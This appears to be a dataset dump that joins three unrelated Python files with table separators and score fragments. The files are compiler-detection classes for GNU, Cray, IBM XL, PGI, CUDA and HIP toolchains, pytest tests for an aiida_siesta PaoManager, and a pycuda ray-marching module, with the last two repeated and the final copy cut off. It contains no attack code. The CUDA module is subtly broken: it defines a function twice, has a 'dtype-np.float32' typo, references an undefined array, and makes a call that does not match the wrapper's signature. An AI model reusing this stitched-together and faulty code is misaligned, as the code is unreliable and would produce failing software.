class OpenAcc_Pgi_Cpp_Compiler(Pthread_Pgi_Cpp_Compiler):
def __init__(self, path, flags):
super(OpenAcc_Pgi_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return ("-acc " +
super(OpenAcc_Pgi_Cpp_Compiler, self).get_option(**kwargs))
class Cuda_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("nvcc")
super(Cuda_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return ("--compiler-options '-fPIC' --shared " +
super(Cuda_Cpp_Compiler, self).get_option(**kwargs))
def check_version(self, version):
return version.startswith("nvcc: NVIDIA")
class Hip_Cpp_Compiler(Cpp_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("hipcc")
super(Hip_Cpp_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
return ("-fPIC --shared " +
super(Hip_Cpp_Compiler, self).get_option(**kwargs))
def check_version(self, version):
return version.startswith("HIP version")
class Gnu_Fortran_Compiler(Fortran_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("gfortran")
super(Gnu_Fortran_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
opt = " "
return "-shared -fPIC " + opt + super(Gnu_Fortran_Compiler,
self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("GNU Fortran")
class AmdFlang_Fortran_Compiler(Fortran_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("flang")
super(AmdFlang_Fortran_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
opt = " "
return "-shared " + opt + super(AmdFlang_Fortran_Compiler,
self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("flang-new version") and "roc" in version
class Cray_Fortran_Compiler(Fortran_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("ftn")
if path is None:
path = which("crayftn")
super(Cray_Fortran_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
opt = " "
return "-shared " + opt + super(Cray_Fortran_Compiler,
self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("Cray Fortran")
class AppleGnu_Fortran_Compiler(Gnu_Fortran_Compiler):
libext = "dylib"
def check_version(self, version):
return sys.platform == "darwin" and super(AppleGnu_Fortran_Compiler,
self).check_version(version)
class IbmXl_Fortran_Compiler(Fortran_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("xlf2008_r")
if path is None:
path = which("xlf2008")
if path is None:
path = which("xlf2003_r")
if path is None:
path = which("xlf2003")
if path is None:
path = which("xlf95_r")
if path is None:
path = which("xlf95")
if path is None:
path = which("xlf90_r")
if path is None:
path = which("xlf90")
super(IbmXl_Fortran_Compiler, self).__init__(path, flags)
def get_version(self):
ver = shellcmd("%s -qversion" % self.path).stdout.decode()
return ver.strip() if ver else None
def get_option(self, **kwargs):
opt = " "
moddir = kwargs.pop("moddir", None)
if moddir:
opt = "-qmoddir=%s " % moddir
return "-qmkshrobj " + opt + super(IbmXl_Fortran_Compiler,
self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("IBM XL Fortran")
class Pgi_Fortran_Compiler(Fortran_Compiler):
def __init__(self, path, flags):
if path is None:
path = which("pgfortran")
super(Pgi_Fortran_Compiler, self).__init__(path, flags)
def get_option(self, **kwargs):
opt = " "
moddir = kwargs.pop("moddir", None)
if moddir:
opt = "-module %s " % moddir
return "-shared -fpic " + opt + super(Pgi_Fortran_Compiler, self).get_option(**kwargs)
def check_version(self, version):
return version.startswith("pgfortran") and "PGI" in version
class Compilers(object):
def __init__(self, backend, compile):
self.clist = []
clist = []
if backend in ("pthread", "c++"):
clist = [Pthread_Gnu_Cpp_Compiler, Pthread_CrayClang_Cpp_Compiler,
Pthread_AmdClang_Cpp_Compiler, Pthread_Pgi_Cpp_Compiler,
Pthread_AppleClang_Cpp_Compiler]
elif backend == "cuda":
clist = [Cuda_Cpp_Compiler]
elif backend == "hip":
clist = [Hip_Cpp_Compiler]
elif backend == "openacc-c++":
clist = [OpenAcc_Gnu_Cpp_Compiler, OpenAcc_CrayClang_Cpp_Compiler,
OpenAcc_Pgi_Cpp_Compiler]
elif backend == "fortran":
clist = [AmdFlang_Fortran_Compiler, Cray_Fortran_Compiler,
Pgi_Fortran_Compiler, IbmXl_Fortran_Compiler,
AppleGnu_Fortran_Compiler, Gnu_Fortran_Compiler]
else:
raise Exception("Compiler for '%s' is not supported." % backend)
for cls in clist:
try:
if compile:
path = which(compile[0])
if path:
self.clist.append(cls(path, compile[1:]))
else:
self.clist.append(cls(None, None))
except Exception as err:
pass
def isavail(self):
return self.select_one() is not None
def select_one(self):
for comp in self.clist:
if comp.isavail():
return comp
def select_many(self):
comps = []
for comp in self.clist:
if comp.isavail():
comps.append(comp)
return comps | 0.468061 | 0.102305 |
import pytest
from aiida_siesta.utils.pao_manager import PaoManager
def test_set_from_ion(generate_ion_data):
pao_man = PaoManager()
ion = generate_ion_data('Si')
pao_man.set_from_ion(ion)
assert pao_man.name == "Si"
assert pao_man._gen_dict is not None
assert pao_man._pol_dict == {3: {1: {1: 4.0531999999999995, 2: 3.1566}}}
assert pao_man._conf_dict == {}
def test_validator_and_get_pao_block():
pao_man = PaoManager()
with pytest.raises(RuntimeError):
pao_man.get_pao_block()
pao_man.name = "Si"
with pytest.raises(RuntimeError):
pao_man.get_pao_block()
pao_man._gen_dict = {3: {0: {1: 4.05}}}
with pytest.raises(RuntimeError):
pao_man.get_pao_block()
pao_man._pol_dict = {}
assert pao_man.get_pao_block() == "Si 1\n n=3 0 1\n 7.65335"
pao_man._gen_dict = {}
with pytest.raises(RuntimeError):
pao_man.get_pao_block()
def test_confinements_features(generate_ion_data):
pao_man = PaoManager()
ion = generate_ion_data('Si_with_conf')
pao_man.set_from_ion(ion)
assert pao_man.name == "Si"
assert pao_man._gen_dict is not None
assert pao_man._pol_dict == {3: {1: {1: 4.0531999999999995, 2: 3.1566}}}
assert pao_man._conf_dict == {'Q': {3: {1: [3.0, 0.5, 0.01]}}, 'E': {3: {0: [2.0, 0.3]}}}
assert pao_man.get_pao_block() == 'Si 2\n n=3 0 2 E 2.0 0.3 \n 5.965078\t 4.419101\n n=3 1 2 P 2 Q 3.0 0.5 0.01 \n 7.659398\t 5.13417'
def test_pao_size(generate_ion_data):
pao_man = PaoManager()
ion = generate_ion_data('Si')
pao_man.set_from_ion(ion)
assert pao_man.pao_size() == "DZDP"
def test_change_all_radius():
pao_man = PaoManager()
pao_man.name = "Si"
pao_man._gen_dict = {3: {0: {1: 4.05}}}
pao_man._pol_dict = {3: {0: {1: 4.05}}}
pao_man.change_all_radius(2)
assert pao_man._gen_dict == {3: {0: {1: 4.131}}}
assert pao_man._pol_dict == {3: {0: {1: 4.131}}}
def test_reset_radius():
pao_man = PaoManager()
pao_man.name = "Si"
pao_man._gen_dict = {3: {0: {1: 4.05}}}
pao_man._pol_dict = {3: {0: {1: 4.05}}}
with pytest.raises(ValueError):
pao_man.reset_radius("Bohr",0.0,3,1,2)
pao_man.reset_radius("Bohr",0.0,3,0,1)
assert pao_man._gen_dict == {3: {0: {1: 0.0}}}
assert pao_man._pol_dict == {3: {0: {1: 0.0}}}
def test_add_polarization():
pao_man = PaoManager()
pao_man.name = "Si"
pao_man._gen_dict = {3: {0: {1: 4.05}}}
pao_man._pol_dict = {3: {0: {1: 4.05}}}
with pytest.raises(ValueError):
pao_man.add_polarization(3,1)
pao_man.add_polarization(3,0)
assert pao_man._pol_dict == {3: {0: {1: 4.05, 2: 0.0}}}
assert pao_man.pao_size() == "SZDP"
def test_remove_polarization():
pao_man = PaoManager()
pao_man.name = "Si"
pao_man._gen_dict = {3: {0: {1: 4.05}}}
pao_man._pol_dict = {3: {0: {1: 4.05, 2: 0.0}}}
with pytest.raises(ValueError):
pao_man.remove_polarization(3,1)
pao_man.remove_polarization(3,0)
assert pao_man._pol_dict == {3: {0: {1: 4.05}}}
assert pao_man.pao_size() == "SZP"
pao_man.remove_polarization(3,0)
assert pao_man._pol_dict == {}
assert pao_man.pao_size() == "SZ"
def test_add_orbital():
pao_man = PaoManager()
pao_man.name = "Si"
pao_man._gen_dict = {3: {0: {1: 4.05}}}
pao_man._pol_dict = {3: {0: {1: 4.05}}}
with pytest.raises(ValueError):
pao_man.add_orbital("Bohr",0.0,3,1,2)
pao_man.add_orbital("Bohr",0.0,3,0,2)
assert pao_man._gen_dict == {3: {0: {1: 4.05, 2: 0.0}}}
assert pao_man.pao_size() == "DZP"
def test_remove_orbital():
pao_man = PaoManager()
pao_man.name = "Si"
pao_man._gen_dict = {3: {0: {1: 4.05, 2: 0.0}}}
pao_man._pol_dict = {3: {0: {1: 4.05}}}
with pytest.raises(ValueError):
pao_man.remove_orbital(3,1,1)
with pytest.raises(ValueError):
pao_man.remove_orbital(3,0,1)
pao_man.remove_orbital(3,0,2)
assert pao_man._gen_dict == {3: {0: {1: 4.05}}}
assert pao_man._pol_dict == {3: {0: {1: 4.05}}}
assert pao_man.pao_size() == "SZP"
pao_man.remove_orbital(3,0,1)
assert pao_man._gen_dict == {}
assert pao_man._pol_dict == {}
def test_remove_polarization_occu(generate_ion_data):
pao_man = PaoManager()
ion = generate_ion_data('Si_with_conf')
pao_man.set_from_ion(ion)
assert pao_man._pol_occu == {3: {1: {1: 0.0, 2: 0.0}}}
pao_man.remove_polarization(3,1)
assert pao_man._pol_dict == {3: {1: {1: 4.0531999999999995}}}
assert pao_man._pol_occu == {3: {1: {1: 0.0}}}
pao_man.remove_polarization(3,1)
assert pao_man._pol_dict == {}
assert pao_man._pol_occu == {}
def test_remove_orbital_occu_and_conf(generate_ion_data):
pao_man = PaoManager()
ion = generate_ion_data('Si_with_conf')
pao_man.set_from_ion(ion)
assert pao_man._gen_occu == {3: {0: {1: 2.0, 2: 0.0}, 1: {1: 2.0, 2: 0.0}}}
assert pao_man._pol_occu == {3: {1: {1: 0.0, 2: 0.0}}}
assert pao_man._conf_dict == {'E': {3: {0: [2.0, 0.3]}}, 'Q': {3: {1: [3.0, 0.5, 0.01]}}}
pao_man.remove_orbital(3,0,2)
assert pao_man._gen_occu == {3: {0: {1: 2.0}, 1: {1: 2.0, 2: 0.0}}}
assert pao_man._pol_occu == {3: {1: {1: 0.0, 2: 0.0}}}
assert pao_man._conf_dict == {'E': {3: {0: [2.0, 0.3]}}, 'Q': {3: {1: [3.0, 0.5, 0.01]}}}
pao_man.remove_orbital(3,0,1)
assert pao_man._gen_occu == {3: {1: {1: 2.0, 2: 0.0}}}
assert pao_man._pol_occu == {3: {1: {1: 0.0, 2: 0.0}}}
assert pao_man._conf_dict == {'Q': {3: {1: [3.0, 0.5, 0.01]}}}
pao_man.remove_orbital(3,1,2)
assert pao_man._gen_occu == {3: {1: {1: 2.0}}}
assert pao_man._pol_occu == {3: {1: {1: 0.0, 2: 0.0}}}
assert pao_man._conf_dict == {'Q': {3: {1: [3.0, 0.5, 0.01]}}}
pao_man.remove_orbital(3,1,1)
assert pao_man._gen_occu == {}
assert pao_man._pol_occu == {}
assert pao_man._conf_dict == {} | tests/utils/test_pao_manager.py | import pytest
from aiida_siesta.utils.pao_manager import PaoManager
def test_set_from_ion(generate_ion_data):
pao_man = PaoManager()
ion = generate_ion_data('Si')
pao_man.set_from_ion(ion)
assert pao_man.name == "Si"
assert pao_man._gen_dict is not None
assert pao_man._pol_dict == {3: {1: {1: 4.0531999999999995, 2: 3.1566}}}
assert pao_man._conf_dict == {}
def test_validator_and_get_pao_block():
pao_man = PaoManager()
with pytest.raises(RuntimeError):
pao_man.get_pao_block()
pao_man.name = "Si"
with pytest.raises(RuntimeError):
pao_man.get_pao_block()
pao_man._gen_dict = {3: {0: {1: 4.05}}}
with pytest.raises(RuntimeError):
pao_man.get_pao_block()
pao_man._pol_dict = {}
assert pao_man.get_pao_block() == "Si 1\n n=3 0 1\n 7.65335"
pao_man._gen_dict = {}
with pytest.raises(RuntimeError):
pao_man.get_pao_block()
def test_confinements_features(generate_ion_data):
pao_man = PaoManager()
ion = generate_ion_data('Si_with_conf')
pao_man.set_from_ion(ion)
assert pao_man.name == "Si"
assert pao_man._gen_dict is not None
assert pao_man._pol_dict == {3: {1: {1: 4.0531999999999995, 2: 3.1566}}}
assert pao_man._conf_dict == {'Q': {3: {1: [3.0, 0.5, 0.01]}}, 'E': {3: {0: [2.0, 0.3]}}}
assert pao_man.get_pao_block() == 'Si 2\n n=3 0 2 E 2.0 0.3 \n 5.965078\t 4.419101\n n=3 1 2 P 2 Q 3.0 0.5 0.01 \n 7.659398\t 5.13417'
def test_pao_size(generate_ion_data):
pao_man = PaoManager()
ion = generate_ion_data('Si')
pao_man.set_from_ion(ion)
assert pao_man.pao_size() == "DZDP"
def test_change_all_radius():
pao_man = PaoManager()
pao_man.name = "Si"
pao_man._gen_dict = {3: {0: {1: 4.05}}}
pao_man._pol_dict = {3: {0: {1: 4.05}}}
pao_man.change_all_radius(2)
assert pao_man._gen_dict == {3: {0: {1: 4.131}}}
assert pao_man._pol_dict == {3: {0: {1: 4.131}}}
def test_reset_radius():
pao_man = PaoManager()
pao_man.name = "Si"
pao_man._gen_dict = {3: {0: {1: 4.05}}}
pao_man._pol_dict = {3: {0: {1: 4.05}}}
with pytest.raises(ValueError):
pao_man.reset_radius("Bohr",0.0,3,1,2)
pao_man.reset_radius("Bohr",0.0,3,0,1)
assert pao_man._gen_dict == {3: {0: {1: 0.0}}}
assert pao_man._pol_dict == {3: {0: {1: 0.0}}}
def test_add_polarization():
pao_man = PaoManager()
pao_man.name = "Si"
pao_man._gen_dict = {3: {0: {1: 4.05}}}
pao_man._pol_dict = {3: {0: {1: 4.05}}}
with pytest.raises(ValueError):
pao_man.add_polarization(3,1)
pao_man.add_polarization(3,0)
assert pao_man._pol_dict == {3: {0: {1: 4.05, 2: 0.0}}}
assert pao_man.pao_size() == "SZDP"
def test_remove_polarization():
pao_man = PaoManager()
pao_man.name = "Si"
pao_man._gen_dict = {3: {0: {1: 4.05}}}
pao_man._pol_dict = {3: {0: {1: 4.05, 2: 0.0}}}
with pytest.raises(ValueError):
pao_man.remove_polarization(3,1)
pao_man.remove_polarization(3,0)
assert pao_man._pol_dict == {3: {0: {1: 4.05}}}
assert pao_man.pao_size() == "SZP"
pao_man.remove_polarization(3,0)
assert pao_man._pol_dict == {}
assert pao_man.pao_size() == "SZ"
def test_add_orbital():
pao_man = PaoManager()
pao_man.name = "Si"
pao_man._gen_dict = {3: {0: {1: 4.05}}}
pao_man._pol_dict = {3: {0: {1: 4.05}}}
with pytest.raises(ValueError):
pao_man.add_orbital("Bohr",0.0,3,1,2)
pao_man.add_orbital("Bohr",0.0,3,0,2)
assert pao_man._gen_dict == {3: {0: {1: 4.05, 2: 0.0}}}
assert pao_man.pao_size() == "DZP"
def test_remove_orbital():
pao_man = PaoManager()
pao_man.name = "Si"
pao_man._gen_dict = {3: {0: {1: 4.05, 2: 0.0}}}
pao_man._pol_dict = {3: {0: {1: 4.05}}}
with pytest.raises(ValueError):
pao_man.remove_orbital(3,1,1)
with pytest.raises(ValueError):
pao_man.remove_orbital(3,0,1)
pao_man.remove_orbital(3,0,2)
assert pao_man._gen_dict == {3: {0: {1: 4.05}}}
assert pao_man._pol_dict == {3: {0: {1: 4.05}}}
assert pao_man.pao_size() == "SZP"
pao_man.remove_orbital(3,0,1)
assert pao_man._gen_dict == {}
assert pao_man._pol_dict == {}
def test_remove_polarization_occu(generate_ion_data):
pao_man = PaoManager()
ion = generate_ion_data('Si_with_conf')
pao_man.set_from_ion(ion)
assert pao_man._pol_occu == {3: {1: {1: 0.0, 2: 0.0}}}
pao_man.remove_polarization(3,1)
assert pao_man._pol_dict == {3: {1: {1: 4.0531999999999995}}}
assert pao_man._pol_occu == {3: {1: {1: 0.0}}}
pao_man.remove_polarization(3,1)
assert pao_man._pol_dict == {}
assert pao_man._pol_occu == {}
def test_remove_orbital_occu_and_conf(generate_ion_data):
pao_man = PaoManager()
ion = generate_ion_data('Si_with_conf')
pao_man.set_from_ion(ion)
assert pao_man._gen_occu == {3: {0: {1: 2.0, 2: 0.0}, 1: {1: 2.0, 2: 0.0}}}
assert pao_man._pol_occu == {3: {1: {1: 0.0, 2: 0.0}}}
assert pao_man._conf_dict == {'E': {3: {0: [2.0, 0.3]}}, 'Q': {3: {1: [3.0, 0.5, 0.01]}}}
pao_man.remove_orbital(3,0,2)
assert pao_man._gen_occu == {3: {0: {1: 2.0}, 1: {1: 2.0, 2: 0.0}}}
assert pao_man._pol_occu == {3: {1: {1: 0.0, 2: 0.0}}}
assert pao_man._conf_dict == {'E': {3: {0: [2.0, 0.3]}}, 'Q': {3: {1: [3.0, 0.5, 0.01]}}}
pao_man.remove_orbital(3,0,1)
assert pao_man._gen_occu == {3: {1: {1: 2.0, 2: 0.0}}}
assert pao_man._pol_occu == {3: {1: {1: 0.0, 2: 0.0}}}
assert pao_man._conf_dict == {'Q': {3: {1: [3.0, 0.5, 0.01]}}}
pao_man.remove_orbital(3,1,2)
assert pao_man._gen_occu == {3: {1: {1: 2.0}}}
assert pao_man._pol_occu == {3: {1: {1: 0.0, 2: 0.0}}}
assert pao_man._conf_dict == {'Q': {3: {1: [3.0, 0.5, 0.01]}}}
pao_man.remove_orbital(3,1,1)
assert pao_man._gen_occu == {}
assert pao_man._pol_occu == {}
assert pao_man._conf_dict == {} | 0.632957 | 0.683268 |
from string import Template
import numpy as np
import pycuda.autoinit
from pycuda.compiler import SourceModule
from pycuda.gpuarray import GPUArray, to_gpu
from .utils import all_arrays_to_gpu, parse_cu_files_to_string
def batch_mvcnn_voxel_traversal_with_ray_marching(
M,
D,
N,
F,
H,
W,
padding,
bbox,
grid_shape,
sampling_scheme
):
"""Compile the CUDA kernel that given the features and the camera matrices
estimates the similarities between the features, performs the marched
voxels along its ray and does the mapping from depth planes to voxel
centers.
Arguments:
----------
M: int, maximum number of marched voxels along ray
D: int, depth planes (discretization steps)
N: int, number of views
F: int, feature size (from the Multi-View CNN)
H: int, image height
W: int, image width,
padding: int, the number of zero-padded pixels around the image to
estimate the features from the Multi-View CNN
bbox: np.array((6,), dtype=np.float32), the coordinates of the bbox
that enclose the scene
grid_shape: np.array((3,), dtype=np.int32), the dimensionality of the
voxel grid
sampling_scheme: string, specification of the sampling scheme
"""
# Set the paths to the files that will be used to construct the cuda kernel
file_paths = [
"ray_tracing.cu",
"utils.cu",
"planes_voxels_mapping.cu",
"feature_similarities.cu",
"sampling_schemes.cu"
]
cu_source_code = parse_cu_files_to_string(file_paths)
tpl = Template(cu_source_code + """
__global__ void batch_mvcnn_planes_voxels_with_ray_marching(
int n_rays,
int * ray_idxs,
float * features,
float * P,
float * P_inv,
float * camera_center,
float * voxel_grid,
int * ray_voxel_indices,
int * ray_voxel_count,
float * S_new
) {
// Compute the thread
int r = threadIdx.x + blockDim.x * blockIdx.x;
if (r >= n_rays)
return;
// Estimate the ray_start and ray_end for the current pixel
float ray_start[3], ray_end[3];
$sampling_scheme(
ray_idxs[r],
P_inv,
camera_center,
ray_start,
ray_end
);
// Compute the similarities between features
float S[$depth_planes];
compute_similarities_per_ray(
features,
P,
ray_start,
ray_end,
S
);
// Estimate the ray_voxel_indices and the ray_voxel_count
voxel_traversal(
ray_start,
ray_end,
ray_voxel_indices + r*$max_voxels*3,
ray_voxel_count + r
);
// Map the depth planes to voxel centers
planes_voxels_mapping(
voxel_grid,
ray_voxel_indices + 3*$max_voxels*r,
ray_voxel_count + r,
ray_start,
ray_end,
S,
S_new + $max_voxels*r
);
}
""")
mod = SourceModule(tpl.substitute(
max_voxels=M,
depth_planes=D,
n_views=N,
padding=padding,
features_dimensions=F,
width=W,
height=H,
grid_x=grid_shape[0],
grid_y=grid_shape[1],
grid_z=grid_shape[2],
bbox_min_x=bbox[0],
bbox_min_y=bbox[1],
bbox_min_z=bbox[2],
bbox_max_x=bbox[3],
bbox_max_y=bbox[4],
bbox_max_z=bbox[5],
sampling_scheme=sampling_scheme
))
cuda_fp = mod.get_function("batch_mvcnn_planes_voxels_with_ray_marching")
cuda_fp.prepare("i" + "P"*9)
@all_arrays_to_gpu
def fp(
ray_idxs,
features,
P,
P_inv,
camera_center,
voxel_grid,
ray_voxel_indices,
ray_voxel_count,
S_new,
threads=2048
):
# Assert everything is the right size, shape and dtype
assert S_new.shape[1] == M
assert len(ray_voxel_count.shape) == 1
assert np.float32 == S_new.dtype
assert np.int32 == ray_voxel_count.dtype
# Determine the grid and block arguments
n_rays = len(S_new)
blocks = n_rays / threads + int(n_rays % threads != 0)
cuda_fp.prepared_call(
(threads, 1),
(blocks, 1, 1),
np.int32(n_rays),
ray_idxs.gpudata,
features.gpudata,
P.gpudata,
P_inv.gpudata,
camera_center.gpudata,
voxel_grid.gpudata,
ray_voxel_indices.gpudata,
ray_voxel_count.gpudata,
S_new.gpudata
)
return fp
def batch_mvcnn_voxel_traversal_with_ray_marching_with_depth_estimation(
M,
D,
N,
F,
H,
W,
padding,
bbox,
grid_shape,
sampling_scheme
):
"""Compile the CUDA kernel that given the features and the camera matrices
estimates the similarities between the features, performs the marched
voxels along its ray and does the mapping from depth planes to voxel
centers. Finally directly convert the per voxel depth distribution to a depth map
Arguments:
----------
M: int, maximum number of marched voxels along ray
D: int, depth planes (discretization steps)
N: int, number of views
F: int, feature size (from the Multi-View CNN)
H: int, image height
W: int, image width,
padding: int, the number of zero-padded pixels around the image to
estimate the features from the Multi-View CNN
bbox: np.array((6,), dtype=np.float32), the coordinates of the bbox
that enclose the scene
grid_shape: np.array((3,), dtype=np.int32), the dimensionality of the
voxel grid
sampling_scheme: string, specification of the sampling scheme
"""
# Set the paths to the files that will be used to construct the cuda kernel
file_paths = [
"ray_tracing.cu",
"utils.cu",
"planes_voxels_mapping.cu",
"feature_similarities.cu",
"sampling_schemes.cu"
]
cu_source_code = parse_cu_files_to_string(file_paths)
tpl = Template(cu_source_code + """
__global__ void batch_mvcnn_planes_voxels_with_ray_marchingi_with_depth(
int n_rays,
int * ray_idxs,
float * features,
float * P,
float * P_inv,
float * camera_center,
float * voxel_grid,
int * ray_voxel_indices,
int * ray_voxel_count,
float * S_new,
float * depth_map
) {
// Compute the thread
int r = threadIdx.x + blockDim.x * blockIdx.x;
if (r >= n_rays)
return;
// Estimate the ray_start and ray_end for the current pixel
float ray_start[3], ray_end[3];
$sampling_scheme(
ray_idxs[r],
P_inv,
camera_center,
ray_start,
ray_end
);
// Compute the similarities between features
float S[$depth_planes];
compute_similarities_per_ray(
features,
P,
ray_start,
ray_end,
S
);
// Estimate the ray_voxel_indices and the ray_voxel_count
voxel_traversal(
ray_start,
ray_end,
ray_voxel_indices + r*$max_voxels*3,
ray_voxel_count + r
);
// Map the depth planes to voxel centers
planes_voxels_mapping(
voxel_grid,
ray_voxel_indices + 3*$max_voxels*r,
ray_voxel_count + r,
ray_start,
ray_end,
S,
S_new + $max_voxels*r
);
// We need to find the voxel center with the highest probability
// based on the S_new
float * Sr = S_new + r*$max_voxels;
float max = -INFINITY;
int max_idx = 0;
for (int i=0; i<$max_voxels; i++) {
if (Sr[i] > max) {
max_idx = i;
max = Sr[i];
}
}
// Associate the voxel_center with id max_idx with a 3D point in
// world coordinates
int idx_x, idx_y, idx_z;
int dim_x = 3*$grid_y*$grid_z;
int dim_y = 3*$grid_z;
int dim_z = 3;
idx_x = ray_voxel_indices[3*$max_voxels*r + 3*max_idx];
idx_y = ray_voxel_indices[3*$max_voxels*r + 3*max_idx + 1];
idx_z = ray_voxel_indices[3*$max_voxels*r + 3*max_idx + 2];
float point[3];
for (int i=0; i<3; i++) {
point[i] = voxel_grid[idx_x*dim_x + idx_y*dim_y + idx_z*dim_z + i];
}
// Get the distance from the camera center
float sum = 0.0;
for (int i=0; i<3; i++) {
sum += pow(point[i] - camera_center[i], 2);
}
depth_map[r] = sqrt(sum);
}
""")
mod = SourceModule(tpl.substitute(
max_voxels=M,
depth_planes=D,
n_views=N,
padding=padding,
features_dimensions=F,
width=W,
height=H,
grid_x=grid_shape[0],
grid_y=grid_shape[1],
grid_z=grid_shape[2],
bbox_min_x=bbox[0],
bbox_min_y=bbox[1],
bbox_min_z=bbox[2],
bbox_max_x=bbox[3],
bbox_max_y=bbox[4],
bbox_max_z=bbox[5],
sampling_scheme=sampling_scheme
))
cuda_fp = mod.get_function("batch_mvcnn_planes_voxels_with_ray_marchingi_with_depth")
cuda_fp.prepare("i" + "P"*10)
@all_arrays_to_gpu
def fp(
ray_idxs,
features,
P,
P_inv,
camera_center,
voxel_grid,
ray_voxel_indices,
ray_voxel_count,
S_new,
depth_map,
threads=2048
):
# Assert everything is the right size, shape and dtype
assert S_new.shape[1] == M
assert len(ray_voxel_count.shape) == 1
assert np.float32 == S_new.dtype
assert np.int32 == ray_voxel_count.dtype
# Determine the grid and block arguments
n_rays = len(S_new)
blocks = n_rays / threads + int(n_rays % threads != 0)
cuda_fp.prepared_call(
(threads, 1),
(blocks, 1, 1),
np.int32(n_rays),
ray_idxs.gpudata,
features.gpudata,
P.gpudata,
P_inv.gpudata,
camera_center.gpudata,
voxel_grid.gpudata,
ray_voxel_indices.gpudata,
ray_voxel_count.gpudata,
S_new.gpudata,
depth_map.gpudata
)
return fp
def perform_mvcnn_with_ray_marching_and_voxel_mapping(
ray_idxs,
features,
P,
P_inv,
camera_center,
bbox,
voxel_grid,
ray_voxel_indices,
ray_voxel_count,
S_new,
padding,
depth_planes,
batch_size=80000,
sampling_scheme="sample_in_bbox"
):
# Extract the numbers of views (N), the maximum number of marched voxels
# (M), the depth planes (D), the image height and the image width
_, M, _ = ray_voxel_indices.shape
D = depth_planes
N, Fh, Fw, F = features.shape
H = Fh - padding - 1
W = Fw - padding - 1
# Make sure that P is a list
assert len(P) == N
# Move to GPU to save some time frome copying
features_gpu = to_gpu(features.ravel())
ray_idxs_gpu = to_gpu(ray_idxs.astype(np.int32))
P_gpu = to_gpu(np.array(P).ravel())
P_inv_gpu = to_gpu(P_inv.ravel())
camera_center_gpu = to_gpu(camera_center)
s_gpu = to_gpu(
np.zeros((batch_size, M), dtype=np.float32)
)
ray_voxel_count_gpu = to_gpu(
np.zeros((batch_size,), dtype=np.int32)
)
ray_voxel_indices_gpu = to_gpu(
np.zeros((batch_size, M, 3), dtype=np.int32)
)
fp = batch_mvcnn_voxel_traversal_with_ray_marching(
M,
D,
N,
F,
H,
W,
padding,
bbox.ravel(),
np.array(voxel_grid.shape[1:]),
sampling_scheme
)
voxel_grid = voxel_grid.transpose(1, 2, 3, 0).ravel()
# Start iterationg over the batch of rays
for i in range(0, len(ray_idxs), batch_size):
ray_voxel_indices_gpu.fill(0)
ray_voxel_count_gpu.fill(0)
s_gpu.fill(0)
fp(
ray_idxs_gpu[i:i+batch_size],
features_gpu,
P_gpu,
P_inv_gpu,
camera_center_gpu,
voxel_grid,
ray_voxel_indices_gpu,
ray_voxel_count_gpu,
s_gpu,
)
idxs = ray_idxs[i:i+batch_size]
ray_voxel_indices[idxs] = ray_voxel_indices_gpu.get()[:len(idxs)]
ray_voxel_count[idxs] = ray_voxel_count_gpu.get()[:len(idxs)]
S_new[idxs] = s_gpu.get()[:len(idxs)]
def perform_mvcnn_with_ray_marching_and_voxel_mapping(
ray_idxs,
features,
P,
P_inv,
camera_center,
bbox,
voxel_grid,
padding,
depth_planes,
batch_size=80000,
sampling_scheme="sample_in_bbox"
):
# Extract the numbers of views (N), the maximum number of marched voxels
# (M), the depth planes (D), the image height and the image width
_, M, _ = ray_voxel_indices.shape
D = depth_planes
N, Fh, Fw, F = features.shape
H = Fh - padding - 1
W = Fw - padding - 1
# Make sure that P is a list
assert len(P) == N
# Move to GPU to save some time frome copying
features_gpu = to_gpu(features.ravel())
ray_idxs_gpu = to_gpu(ray_idxs.astype(np.int32))
P_gpu = to_gpu(np.array(P).ravel())
P_inv_gpu = to_gpu(P_inv.ravel())
camera_center_gpu = to_gpu(camera_center)
s_gpu = to_gpu(
np.zeros((batch_size, M), dtype=np.float32)
)
ray_voxel_count_gpu = to_gpu(
np.zeros((batch_size,), dtype=np.int32)
)
ray_voxel_indices_gpu = to_gpu(
np.zeros((batch_size, M, 3), dtype=np.int32)
)
depth_map = to_gpu(
np.zeros(H*W, dtype-np.float32)
)
fp = batch_mvcnn_voxel_traversal_with_ray_marching(
M,
D,
N,
F,
H,
W,
padding,
bbox.ravel(),
np.array(voxel_grid.shape[1:]),
sampling_scheme
)
voxel_grid = voxel_grid.transpose(1, 2, 3, 0).ravel()
# Start iterationg over the batch of rays
for i in range(0, len(ray_idxs), batch_size):
ray_voxel_indices_gpu.fill(0)
ray_voxel_count_gpu.fill(0)
s_gpu.fill(0)
fp(
ray_idxs_gpu[i:i+batch_size],
features_gpu,
P_gpu,
P_inv_gpu,
camera_center_gpu,
voxel_grid,
ray_voxel_indices_gpu,
ray_voxel_count_gpu,
s_gpu,
depth_map
)
return depth_map.get().reshape(W, H).T | raynet/cuda_implementations/mvcnn_with_ray_marching_and_voxels_mapping.py | from string import Template
import numpy as np
import pycuda.autoinit
from pycuda.compiler import SourceModule
from pycuda.gpuarray import GPUArray, to_gpu
from .utils import all_arrays_to_gpu, parse_cu_files_to_string
def batch_mvcnn_voxel_traversal_with_ray_marching(
M,
D,
N,
F,
H,
W,
padding,
bbox,
grid_shape,
sampling_scheme
):
"""Compile the CUDA kernel that given the features and the camera matrices
estimates the similarities between the features, performs the marched
voxels along its ray and does the mapping from depth planes to voxel
centers.
Arguments:
----------
M: int, maximum number of marched voxels along ray
D: int, depth planes (discretization steps)
N: int, number of views
F: int, feature size (from the Multi-View CNN)
H: int, image height
W: int, image width,
padding: int, the number of zero-padded pixels around the image to
estimate the features from the Multi-View CNN
bbox: np.array((6,), dtype=np.float32), the coordinates of the bbox
that enclose the scene
